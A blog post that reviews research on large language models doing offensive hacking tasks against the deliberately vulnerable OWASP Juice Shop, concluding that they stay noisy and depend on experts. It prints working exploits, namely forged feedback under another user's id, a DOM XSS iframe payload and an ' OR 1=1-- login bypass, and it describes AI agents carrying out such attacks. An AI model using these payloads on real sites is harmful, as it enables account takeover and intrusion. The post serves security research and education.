Harnessing AI for Cyber Offense: The Potential and Pitfalls of Large Language Models in Modern Cybersecurity

Reviewing the Research: LLMs in Offensive Cybersecurity
I reviewed the OWASP LLM Exploit Generation report and conducted independent research to assess the real-world viability of Large Language Models (LLMs) in offensive cybersecurity. While LLMs can assist with certain hacking tasks, like generating payloads or automating parts of vulnerability research, the process is far from seamless. Successful exploitation still requires human oversight, technical expertise, and iterative trial and error. Current AI-driven attacks remain noisy, inefficient, and highly dependent on well-structured prompts. In short, while LLMs may one day reshape offensive security, they are not yet an automated hacking solution for low-skill attackers. The hype outweighs the reality, at least for now.
Exploring the Role of Large Language Models in Offensive Cybersecurity
The cybersecurity landscape continues to evolve alongside the technology that threatens it. Large Language Models (LLMs) such as GPT-4o and Claude are garnering attention for their potential applications in offensive cybersecurity. While initial research indicates these models can automate vulnerability exploitation, questions remain about their practicality and efficiency: do LLMs genuinely offer new capabilities to attackers, or are they an overhyped tool with limited usability? Our study examines the challenges and opportunities LLMs present in executing complex cyber attacks, using the OWASP Juice Shop as a testing ground.
Experimental Design and Results
The study explored several tasks within the OWASP Juice Shop environment, using advanced LLMs for exercises such as DOM XSS attacks and forging user feedback. The tasks varied in complexity and targeted vulnerabilities that simulate real-world cyber threats. Setting up Juice Shop required forking the Cybench repository and adding configurations for cloud compatibility. Throughout these operations, the LLMs generated detailed exploit instructions, revealing both their potential and their notable flaws, especially on less straightforward objectives.
This deliberate task selection aimed to expose differences in capability between models. The LLMs attempted operations like accessing confidential documents, posting feedback under another user's name, and performing DOM-based and reflected XSS attacks, each analogous to a genuine security challenge. The forged-feedback task gives a sense of what the models were asked to produce.
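To make that concrete, here is a minimal sketch of the kind of exploit script an LLM might produce for the forged-feedback task. The endpoint and field names follow Juice Shop's public REST API, but treat the specifics as assumptions rather than the study's actual output:

```python
# Sketch of an LLM-generated exploit for the "post feedback as another
# user" task against a local OWASP Juice Shop instance.
import requests

BASE = "http://localhost:3000"  # default local Juice Shop address

# Juice Shop issues a simple arithmetic CAPTCHA for feedback submissions.
captcha = requests.get(f"{BASE}/rest/captcha").json()

payload = {
    # The server trusts the client-supplied UserId, so naming another
    # user's id forges the feedback's author.
    "UserId": 1,  # e.g., the admin account
    "comment": "Forged feedback, submitted as someone else",
    "rating": 5,
    "captchaId": captcha["captchaId"],
    # The CAPTCHA is an arithmetic expression like "6*7-3"; evaluate it.
    "captcha": str(eval(captcha["captcha"])),
}

resp = requests.post(f"{BASE}/api/Feedbacks", json=payload)
print(resp.status_code, resp.json())
```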

Setting up the experiment required extensive groundwork. Forking the Cybench repository enabled the creation of a tailored testing framework that supported interaction with the Juice Shop. This involved installing necessary software and coordinating resources across AWS and GCP for seamless workload distribution. Each model had the appropriate context and tools to attempt solving the assigned tasks, providing a sandbox for monitoring their effectiveness.
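For readers unfamiliar with Cybench-style harnesses, the core of such a framework reduces to a simple agent loop: hand the model the task context, execute whatever command it proposes inside the sandbox, and feed the output back for the next turn. The sketch below is illustrative only; names like query_model are placeholders, not the actual Cybench API:

```python
# Illustrative skeleton of the agent loop behind Cybench-style harnesses.
import subprocess

def run_in_sandbox(command: str, timeout: int = 60) -> str:
    """Execute a model-proposed shell command and capture its output."""
    result = subprocess.run(
        command, shell=True, capture_output=True, text=True, timeout=timeout
    )
    return result.stdout + result.stderr

def solve_task(task_prompt: str, query_model, max_turns: int = 15) -> None:
    """Loop: model proposes a command, sandbox runs it, output feeds back."""
    history = [task_prompt]
    for _ in range(max_turns):
        command = query_model("\n".join(history))  # e.g., a GPT-4o API call
        if command.strip() == "DONE":
            break
        output = run_in_sandbox(command)
        history.append(f"$ {command}\n{output}")
```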
The setup offered fascinating insights into both the strengths and weaknesses of LLMs in offensive cybersecurity. While models like GPT-4o displayed prowess in generating attack scenarios and identifying known vulnerabilities, they stumbled on complex tasks that lacked well-defined solutions. This underscores a critical observation: LLMs excel at guided problem-solving but struggle when a task demands creativity and adaptation beyond what their training has prepared them for.
Selected OWASP Juice Shop Tasks
The selected tasks spanned a range of difficulty: retrieving a confidential document, posting feedback under another user's name, and executing both DOM-based and reflected XSS attacks. Each mirrored a vulnerability class routinely exploited in the wild, and each forced the models to act on loosely specified objectives, much as a real attacker would. Across these exercises, GPT-4o and Claude produced plausible attack vectors for the well-documented challenges, but performance degraded whenever a task demanded problem-solving beyond pre-structured guidance. That pattern pointed to autonomy and adaptability, rather than raw knowledge, as the binding constraints on LLM-driven offense. The DOM XSS task gives a sense of the flavor of these exercises; a verification sketch follows.
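Because DOM XSS only manifests inside a browser, checking whether an attempt succeeded has to be automated with a driver such as Selenium. The payload below is the widely documented solution to Juice Shop's DOM XSS challenge; the URL, waits, and driver setup are illustrative assumptions:

```python
# Verify Juice Shop's DOM XSS challenge by loading the injected search URL
# in a real browser and checking whether the alert fires.
from urllib.parse import quote
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

PAYLOAD = '<iframe src="javascript:alert(`xss`)">'
URL = "http://localhost:3000/#/search?q=" + quote(PAYLOAD)

driver = webdriver.Chrome()
try:
    driver.get(URL)
    # If the payload executed, a JavaScript alert box appears.
    WebDriverWait(driver, 5).until(EC.alert_is_present())
    alert = driver.switch_to.alert
    print("XSS fired:", alert.text)
    alert.accept()
finally:
    driver.quit()
```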
Key Observations
The experimentation with LLMs uncovered critical challenges and insights. Notably, the models' rigid pursuit of their assigned goals occasionally caused them to overlook more significant security issues. The researchers dubbed this the 'Searching for Tin, Ignoring Gold' phenomenon: while chasing a specific task, the LLMs walked past crucial vulnerabilities, such as an exploitable SQL injection sitting in plain sight.
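That missed injection is worth spelling out. Juice Shop's login endpoint concatenates the email field into a SQL query, so a one-line payload bypasses authentication entirely. A minimal sketch, assuming a default local instance:

```python
# The classic Juice Shop login bypass: the injected email comments out the
# password check, returning the first user in the table (the admin).
import requests

resp = requests.post(
    "http://localhost:3000/rest/user/login",
    json={"email": "' OR 1=1--", "password": "anything"},
)
print(resp.status_code)
# A successful bypass returns an authentication token for the admin.
print(resp.json().get("authentication", {}).get("token", "no token"))
```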
The researchers also encountered 'installation loops,' an operational failure mode in which the agent cycled through the same setup actions without ever reaching a working state. These loops typically stemmed from software dependency problems and burned time and compute without meaningful progress. For instance, trying to align Selenium with outdated browser drivers trapped the agent in retries that never converged.
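One pragmatic way to break such loops, not something the study itself describes, is to stop letting the agent install drivers by hand and lean on Selenium Manager, which ships with Selenium 4.6+ and resolves a matching driver automatically:

```python
# Sidestep the driver-mismatch loop: Selenium Manager (bundled with
# Selenium 4.6+) fetches a chromedriver that matches the installed browser.
# Requires: pip install "selenium>=4.6"
from selenium import webdriver
from selenium.webdriver.chrome.options import Options

options = Options()
options.add_argument("--headless=new")  # no display in a cloud sandbox
options.add_argument("--no-sandbox")    # commonly needed inside containers

driver = webdriver.Chrome(options=options)  # driver resolved automatically
print(driver.capabilities["browserVersion"])
driver.quit()
```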

The economic analysis highlighted another layer of complexity. While infrastructure costs were manageable, the human costs were not: devising offensive strategies for five Juice Shop tasks consumed 82 developer hours. At even a notional $100 per hour, that is over $8,000 of expert labor for five training-ground challenges, and the level of expertise required to harness these LLMs effectively poses a significant barrier for less-skilled operators.
These observations underscore the sophistication needed to skillfully leverage LLMs. The inherent expertise barrier reduces their practicality for low-skill cyber actors, indicating that while LLMs have potential, they are best suited for augmenting the skills of experienced penetration testers rather than democratizing complex offensive cyber capabilities.
Implications for LLM-Based Hacking
LLM-based hacking tools present significant implications for the cybersecurity domain. Expert domain knowledge remains crucial despite LLMs' technical prowess, given their requirement for precise guidance in executing multi-step tasks. During our experiments, we noted that while LLMs demonstrated significant potential, they required expert input to adaptively tackle complex hacking challenges, underscoring a need for seasoned oversight.
Moreover, LLM performance varies significantly across security tasks: a model that excels in one area may falter in another, which pushes comprehensive assessments toward multi-model solutions. One LLM might shine at web application security while another handles scripting or network vulnerabilities better. No single model currently offers a universal solution across all cybersecurity needs, so approaches must be tailored.
Operationally, LLM use is not inherently stealthy. The high volume of requests these agents generate, together with their noisy, repetitive retry behavior, makes them readily detectable by existing security monitoring. This limits their applicability for stealth-focused cyber operations; attackers would need additional tools or techniques to reduce their footprint. The toy detector below illustrates why this traffic stands out.
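Consider a simple rate-based detector over a web server access log. The log format and threshold here are illustrative assumptions, not anything from the study:

```python
# Toy detector: flag source IPs whose request volume in a log window
# exceeds a threshold, the signature that noisy LLM-driven probing leaves.
from collections import Counter

THRESHOLD = 500  # requests per log window; tune for your traffic

def flag_noisy_sources(log_lines):
    # Common log format puts the client IP in the first field.
    counts = Counter(line.split()[0] for line in log_lines if line.strip())
    return [ip for ip, n in counts.items() if n > THRESHOLD]

with open("access.log") as f:
    for ip in flag_noisy_sources(f):
        print(f"possible automated scanner: {ip}")
```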
While LLMs hold promise as aids to skilled human hackers, the challenge remains automating the exploitation of sophisticated vulnerabilities without manual oversight. Ultimately, although LLMs can enhance the toolkit of an experienced attacker, their current reliance on human-driven processes means they cannot autonomously execute complex offensive operations without expert intervention.
Conclusions
In conclusion, while LLMs have demonstrated potential in executing certain offensive cybersecurity tasks, they come with substantial limitations. The current landscape suggests LLMs can enhance the efforts of skilled security professionals rather than replace traditional tools or empower novice hackers. The need for advanced models and significant domain expertise remains a barrier to entry. Future work should focus on improving LLM capabilities and refining operational methodology to overcome these obstacles. As the technology evolves, the cybersecurity community will continue to grapple with its implications, balancing innovation with practicality.
Nate W (aka GreyFriar)
Cybersecurity Analyst | AI & Security Trends | n8n Agentic Workflows
🔗 LinkedIn: Nate W
🕵️ Blog: AI Security Research
✍️ Medium: @greyfriar
🐦 X (Twitter): @etcpwd13
👉 Do me a favor—if you found this post useful, give it a like or share! It helps out a lot.